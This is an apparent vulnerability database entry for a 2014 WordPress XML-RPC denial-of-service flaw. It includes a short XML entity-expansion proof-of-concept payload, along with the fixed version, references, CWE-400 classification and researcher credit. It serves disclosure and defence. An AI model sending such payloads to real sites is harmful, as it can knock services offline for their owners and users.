WordPress 3.5-3.7.1 - XML-RPC Denial of Service



Proof of Concept
<?xml version="1.0"?>
<!DOCTYPE DoS [
<!ENTITY a "xxxxxxxxxxxxxxxxx...">
]>
<DoS>&a;&a;&a;&a;&a;&a;&a;&a;&a;…</DoS>

Affects WordPresses

fixed in version 3.9.2

References

URL https://web.archive.org/web/20140825133704/http://www.breaksec.com/?p=6362
URL https://wordpress.org/news/2014/08/wordpress-3-9-2/
URL http://mashable.com/2014/08/06/wordpress-xml-blowup-dos/

Classification

Type DOS
CWE CWE-400

Miscellaneous

Original Researcher Nir Goldshlager
Verified Yes
WPVDB ID 7526

Timeline

Publicly Published 2014-08-27 (almost 6 years ago)
Added 2014-08-27 (almost 6 years ago)
Last Updated 2020-04-13 (about 2 months ago)
